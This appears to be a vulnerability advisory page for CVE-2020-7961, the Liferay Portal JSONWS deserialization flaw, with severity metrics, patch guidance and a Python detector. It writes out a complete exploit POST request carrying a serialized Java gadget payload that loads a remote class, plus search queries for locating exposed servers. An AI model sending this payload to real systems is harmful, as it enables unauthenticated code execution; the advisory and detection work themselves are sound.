Attacker Value: Very High (4 users assessed)
Exploitability: Very High (4 users assessed)
User Interaction: None
Privileges Required: None
Attack Vector: Network

CVE-2020-7961

Disclosure Date: March 20, 2020
Exploited in the Wild

Description

Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).

Technical Analysis

A Metasploit module has been written: https://github.com/rapid7/metasploit-framework/pull/13213.

ETA: Please see the Rapid7 analysis. CVE-2020-7961 is being used in the “FreakOut” attack campaign.

Technical Analysis

Google dork:- inurl:/api/jsonws

Shodan:- Powered+By+Liferay

publicwww:-https://publicwww.com/websites/Powered+By+Liferay/

POC:-
https://github.com/mzer0one/CVE-2020-7961-POC

Technical Analysis

Quick assessment to add references:
Good write-up of the vulnerability: https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html
Working PoC: https://github.com/mzer0one/CVE-2020-7961-POC

There is not so much to add here because Synacktiv already explained what’s interesting: a preauth RCE on a framework that is commonly used in enterprises and is internet-facing, a framework NOT updated on a regular basis.

Plus, based on my very own experience, Liferay/Tomcat on Windows lets you mostly land as SYSTEM. With an install base, according to Shodan, of more than half on Windows, this is a very interesting vuln to exploit.

Technical Analysis

This has now been reported as being exploited in the wild as part of the FreakOut attacks as first reported by CheckPoint Research at https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/.

CVSS V3 Severity and Metrics
Base Score: 9.8 Critical
Impact Score: 5.9
Exploitability Score: 3.9
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Vendors

  • liferay

Products

  • liferay portal

Technical Analysis

Description

Update January 19, 2021: Check Point Research released a blog post warning that the “FreakOut” attack campaign is utilizing CVE-2020-7961, as well as CVE-2020-28188 and CVE-2021-3007, to infect hosts with IRC botnet malware. Rapid7 urges customers to incorporate incident response into their remediation of CVE-2020-7961.

On November 25, 2019, Liferay released a security advisory for CVE-2020-7961, a Java deserialization vulnerability in Liferay Portal’s JSON Web Services (JSONWS). Exploitation of the vulnerability leads to unauthenticated remote code execution (RCE) in Liferay Portal versions 7.2.0 and earlier. Markus Wulftange of Code White is credited with the discovery of CVE-2020-7961.

On March 20, 2020, Code White released a technical writeup on the Liferay Portal vulnerabilities they discovered, notably detailing their discovery of CVE-2020-7961. Code White did not release a proof-of-concept (PoC) for CVE-2020-7961 but did prove they had achieved RCE with it.

On March 30, 2020, Thomas Etrillard of Synacktiv released an analysis of CVE-2020-7961 based on Code White’s research. Etrillard further documented the PoC commands necessary to exploit the vulnerability. A Metasploit module exists for CVE-2020-7961.

Affected products

Liferay Portal 7.2.0 and earlier.

Rapid7 analysis

CVE-2020-7961 is exploitable by sending a single HTTP POST request to the /api/jsonws/expandocolumn/update-column endpoint, as seen in the following example Metasploit request.

POST /api/jsonws/expandocolumn/update-column HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1338

columnId=12&name=12&type=37&%2bdefaultData=com.mchange.v2.c3p0.WrapperConnectionPoolDataSource&defaultData.userOverridesAsString=HexAsciiSerializedMap%3aaced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400174a767469616c7462616d6e6676626264726c7a70667869740016687474703a2f2f3132372e302e302e313a383038322f7400174a767469616c7462616d6e6676626264726c7a70667869%3b

The Java deserialization attack can be seen in the request’s defaultData.userOverridesAsString parameter.

wvu@kharak:~$ xxd -r -p <<<aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400174a767469616c7462616d6e6676626264726c7a70667869740016687474703a2f2f3132372e302e302e313a383038322f7400174a767469616c7462616d6e6676626264726c7a70667869 | tee >(file -) >(xxd) > /dev/null
00000000: aced 0005 7372 003d 636f 6d2e 6d63 6861  ....sr.=com.mcha
00000010: 6e67 652e 7632 2e6e 616d 696e 672e 5265  nge.v2.naming.Re
00000020: 6665 7265 6e63 6549 6e64 6972 6563 746f  ferenceIndirecto
00000030: 7224 5265 6665 7265 6e63 6553 6572 6961  r$ReferenceSeria
00000040: 6c69 7a65 6462 1985 d0d1 2ac2 1302 0004  lizedb....*.....
00000050: 4c00 0b63 6f6e 7465 7874 4e61 6d65 7400  L..contextNamet.
00000060: 134c 6a61 7661 782f 6e61 6d69 6e67 2f4e  .Ljavax/naming/N
00000070: 616d 653b 4c00 0365 6e76 7400 154c 6a61  ame;L..envt..Lja
00000080: 7661 2f75 7469 6c2f 4861 7368 7461 626c  va/util/Hashtabl
00000090: 653b 4c00 046e 616d 6571 007e 0001 4c00  e;L..nameq.~..L.
000000a0: 0972 6566 6572 656e 6365 7400 184c 6a61  .referencet..Lja
000000b0: 7661 782f 6e61 6d69 6e67 2f52 6566 6572  vax/naming/Refer
000000c0: 656e 6365 3b78 7070 7070 7372 0016 6a61  ence;xppppsr..ja
000000d0: 7661 782e 6e61 6d69 6e67 2e52 6566 6572  vax.naming.Refer
000000e0: 656e 6365 e8c6 9ea2 a8e9 8d09 0200 044c  ence...........L
000000f0: 0005 6164 6472 7374 0012 4c6a 6176 612f  ..addrst..Ljava/
00000100: 7574 696c 2f56 6563 746f 723b 4c00 0c63  util/Vector;L..c
00000110: 6c61 7373 4661 6374 6f72 7974 0012 4c6a  lassFactoryt..Lj
00000120: 6176 612f 6c61 6e67 2f53 7472 696e 673b  ava/lang/String;
00000130: 4c00 1463 6c61 7373 4661 6374 6f72 794c  L..classFactoryL
00000140: 6f63 6174 696f 6e71 007e 0007 4c00 0963  ocationq.~..L..c
00000150: 6c61 7373 4e61 6d65 7100 7e00 0778 7073  lassNameq.~..xps
00000160: 7200 106a 6176 612e 7574 696c 2e56 6563  r..java.util.Vec
00000170: 746f 72d9 977d 5b80 3baf 0103 0003 4900  tor..}[.;.....I.
00000180: 1163 6170 6163 6974 7949 6e63 7265 6d65  .capacityIncreme
00000190: 6e74 4900 0c65 6c65 6d65 6e74 436f 756e  ntI..elementCoun
000001a0: 745b 000b 656c 656d 656e 7444 6174 6174  t[..elementDatat
000001b0: 0013 5b4c 6a61 7661 2f6c 616e 672f 4f62  ..[Ljava/lang/Ob
000001c0: 6a65 6374 3b78 7000 0000 0000 0000 0075  ject;xp........u
000001d0: 7200 135b 4c6a 6176 612e 6c61 6e67 2e4f  r..[Ljava.lang.O
000001e0: 626a 6563 743b 90ce 589f 1073 296c 0200  bject;..X..s)l..
000001f0: 0078 7000 0000 0a70 7070 7070 7070 7070  .xp....ppppppppp
00000200: 7078 7400 174a 7674 6961 6c74 6261 6d6e  pxt..Jvtialtbamn
00000210: 6676 6262 6472 6c7a 7066 7869 7400 1668  fvbbdrlzpfxit..h
00000220: 7474 703a 2f2f 3132 372e 302e 302e 313a  ttp://127.0.0.1:
00000230: 3830 3832 2f74 0017 4a76 7469 616c 7462  8082/t..Jvtialtb
00000240: 616d 6e66 7662 6264 726c 7a70 6678 69    amnfvbbdrlzpfxi
/dev/stdin: Java serialization data, version 5
wvu@kharak:~$
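
One way to flag this request shape in captured or proxied POST bodies, as an added example that is not Rapid7's or Metasploit's code. It looks for the two markers visible in the request above: a parameter name prefixed with `+` that carries a class name, and a `HexAsciiSerializedMap` value whose hex begins with the Java serialization header `aced0005`. The function names and both sample bodies are constructed for illustration, and only form-encoded bodies are handled.

```python
import re
from urllib.parse import parse_qsl

JAVA_SER_MAGIC = "aced0005"  # stream magic + version 5, the first bytes of the xxd dump
HEX_MAP = re.compile(r"HexAsciiSerializedMap:([0-9a-fA-F]*)")

# Constructed samples. The first copies the parameter layout of the request
# above with the hex payload cut down to a few harmless header bytes.
SAMPLE_SUSPICIOUS = (
    "columnId=12&name=12&type=37"
    "&%2bdefaultData=com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
    "&defaultData.userOverridesAsString=HexAsciiSerializedMap%3aaced000573720001%3b"
)
SAMPLE_BENIGN = "columnId=12&name=12&type=37&defaultData=hello"


def inspect_jsonws_form(path, body):
    """Return (kind, parameter, detail) findings for one form-encoded request."""
    if "/api/jsonws" not in path.lower():
        return []
    findings = []
    # parse_qsl percent-decodes, so %2b becomes '+' and %3a becomes ':'.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name.startswith("+"):
            # Assumption drawn from the request above: the value names a Java class.
            findings.append(("type-override", name[1:], value))
        match = HEX_MAP.search(value)
        if match:
            blob = match.group(1).lower()
            kind = "java-serialized" if blob.startswith(JAVA_SER_MAGIC) else "hex-map"
            findings.append((kind, name, blob[:16]))
    return findings


def is_deserialization_attempt(path, body):
    """High-confidence verdict: a type override together with a serialized stream."""
    kinds = {kind for kind, _, _ in inspect_jsonws_form(path, body)}
    return {"type-override", "java-serialized"} <= kinds


if __name__ == "__main__":
    url = "/api/jsonws/expandocolumn/update-column"
    for label, body in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, is_deserialization_attempt(url, body))
        for finding in inspect_jsonws_form(url, body):
            print("   ", finding)
```

Standard access logs do not record POST bodies, so this check needs a source that does, such as a reverse proxy, WAF, or packet capture.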

Guidance

Rapid7 recommends that Liferay Portal customers apply the appropriate patch or workaround in this document. The patch and workaround information is reproduced below.

Patches

Liferay Portal 7.2: There is no patch available for Liferay Portal 7.2.0. Instead, users should upgrade to Liferay Portal 7.2 CE GA2 (7.2.1) or later.

Liferay Portal 7.1: Source patch for Liferay Portal 7.1 GA4 (7.1.3) is available on GitHub. Details for working with source patches can be found on the Patching Liferay Portal page.

Liferay Portal 7.0: Source patch for Liferay Portal 7.0 GA7 (7.0.6) is available on GitHub. Details for working with source patches can be found on the Patching Liferay Portal page.

Liferay Portal 6.2: Source patch for Liferay Portal 6.2 GA6 (6.2.5) is available on GitHub. Details for working with source patches can be found on the Patching Liferay Portal page.

Workaround

Disable JSONWS by setting the portal.property jsonws.servlet.hosts.allowed=Not/Available.
